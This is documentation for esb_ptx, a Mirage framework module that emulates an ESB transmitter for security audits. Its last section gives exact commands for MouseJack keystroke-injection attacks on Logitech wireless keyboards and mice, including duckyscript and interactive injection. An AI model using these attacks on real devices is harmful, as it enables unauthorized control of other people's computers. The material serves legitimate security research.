esb_ptx

Presentation

esb_ptx simulates a PTX device’s behaviour. It is a core module for the framework, allowing to quickly build recurrent behaviours during a security audit. If a scenario is provided, the module is launched in “scenario” mode, with events given as callbacks on specific packet types, allowing to implement complex interactions. Otherwise, it is launched in “interpreter” mode, opening a CLI for the user.

A follow mode is provided thanks to the FOLLOW_MODE parameter, allowing to regularly check if the corresponding PRX is responding on the current channel. It sends ping request every second and if no acknowledgement frame is received, then the module will automatically scan channels in order to find it.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rfstorm0

rfstormX

Interface to use

TARGET

<ESB address>

Target address

FOLLOW_MODE

yes

yes|no

Follow mode

SCENARIO

<scenario>

Scenario to use

Scenario signals

The behaviour of this module can be modified using scenarios. If you need more details about Mirage scenarios, their usage is described here. The following signals are generated by this module if a scenario is provided using the SCENARIO input parameter :

Signal

Parameters

Activation

Default behaviour

onStart

when the module starts its execution

nothing is executed

onEnd

when the module stops its execution

nothing is executed

onKey

key

when a key is pressed

nothing is executed

onESBAckResponse

packet

when an incoming acknowledgment is received (from PRX)

nothing is executed

onPingFailure

when the ping response acknowledgement is not received (from PRX)

nothing is executed

onPRXFound

when the PRX has been found by the scan initiated after the ping failure

nothing is executed

You can manually stop the module’s execution by calling the method stopScenario:

self.module.stopScenario()

Commands

The following commands are available in the CLI interface :

  • clear : clears the screen

  • channel : displays the current channel

  • channel <channel> : moves to the provided channel

  • scan : calls the esb_scan module to list near ESB devices

  • scan <duration> : calls the esb_scan module for the specified duration to list near ESB devices

  • scan <duration> <start_channel> <end_channel> : calls the esb_scan module for the specified duration on the specified channel range to list near ESB devices

  • address : displays the address currently selected

  • address <ESB address> : changes the address to the one provided

  • find_prx : performs an active scan in order to find the corresponding PRX

  • find_prx <channel_range> : performs an active scan in order to find the corresponding PRX in the selected channel range (e.g. “0-10”)

  • follow_prx : enables the follow mode

  • unfollow_prx : disables the follow mode

  • send <payload> : sends a specific payload to the PRX

  • send <payload1>,<payload2>,… : sends multiple payloads to the PRX

  • exit : ends the execution

Usage

CLI mode

If you want to use this module in CLI mode, just calls the module without input parameters :

$ mirage esb_ptx
[INFO] Module esb_ptx loaded !
[PTX|12]:

You can easily scan the devices using the scan command :

[PTX|99]: scan
┌────────────────┬──────────┬──────────┐
│ Address        │ Channels │ Protocol │
├────────────────┼──────────┼──────────┤
│ E8:46:F9:2F:A4 │ 8        │ logitech │
└────────────────┴──────────┴──────────┘
())))))))))))))))))))))))))))))))))))))))))))))))))___________) Channel: 81

Then, you can select a specific address using address :

[PTX|98]: address E8:46:F9:2F:A4
[PTX|98|E8:46:F9:2F:A4]:

You can automatically find the PRX using the find_prx command :

[PTX|98|E8:46:F9:2F:A4]: find_prx
[SUCCESS] ACK received from PRX on channel #8
[PTX| 8|E8:46:F9:2F:A4]:

Or you can also manually set the channel using channel command :

[PTX| 8|E8:46:F9:2F:A4]: channel 23
[PTX|23|E8:46:F9:2F:A4]:

You can enable the follow mode using follow_prx command:

[PTX|23|E8:46:F9:2F:A4]: follow_prx
[PTX| 8|E8:46:F9:2F:A4]:

and disable it using unfollow_prx:

[PTX| 8|E8:46:F9:2F:A4]: unfollow_prx
[PTX| 8|E8:46:F9:2F:A4]:

Finally, you can easily transmit payloads using send:

[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f
[SUCCESS] ACK received.
[PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f,1122,3344
[SUCCESS] ACK received.
[SUCCESS] ACK received.
[SUCCESS] ACK received.

Customizing the behaviour using scenarios

If you want to use a scenario, you can use the create_scenario command in order to generate a basic code :

$ mirage --create_scenario
[QUESTION] Scenario's name : esb_ptx_test
[SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_ptx_test.py
[INFO] Mirage process terminated !

Then, you can modify the code as you want.

If you want to use this scenario, just provide its name as the value of the input parameter SCENARIO :

$ sudo mirage esb_ptx SCENARIO=esb_ptx_test
[INFO] Module esb_ptx loaded !
[INFO] Scenario loaded !
[...]
[INFO] Mirage process terminated !

Performing keystrokes injection attacks

Two main scenarios are provided, allowing to easily perform the unencrypted and encrypted keystrokes injection attacks targeting Logitech mices and keyboards described in MouseJack whitepaper:

  • logitech_unencrypted_keystrokes_injection: This scenario allows to inject unencrypted keystrokes to a wireless mouse address, bypassing the encryption.

  • logitech_encrypted_keystrokes_injection: This scenario allows to inject forged encrypted keystrokes by exploiting a weakness in the AES implementation of Logitech Unifying.

These scenarios can be used by providing them as a scenario to the module. They can be used in three modes :

If you want to inject a simple text, provide a new parameter named TEXT to the module:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection TEXT=bonjour
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Text injection: bonjour
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
bonjour

If you want to perform a more complex keystrokes injection, you can provide a duckyscript file:

$ cat > /tmp/duck.ducky
DELAY 1000
ALT F2
DELAY 1000
STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation
DELAY 1000
ENTER
$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection DUCKYSCRIPT=/tmp/duck.ducky
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Duckyscript injection: /tmp/duck.ducky
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Terminating scenario ...
[INFO] Mirage process terminated !

Finally, you can also use the interactive mode in order to directly interact with the target computer:

$ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection INTERACTIVE=yes
[INFO] Module esb_ptx loaded !
[INFO] Enabling following mode ...
[INFO] Scenario loaded !
[INFO] Following mode disabled by the scenario.
[INFO] Generating attack stream ...
[INFO] Interactive mode
[INFO] Looking for target E8:46:F9:2F:A4...
[SUCCESS] Target found !
[INFO] Injecting ...
[INFO] Injecting:b
[INFO] Injecting:o
[INFO] Injecting:n
[INFO] Injecting:j
[INFO] Injecting:o
[INFO] Injecting:u
[INFO] Injecting:r
[...]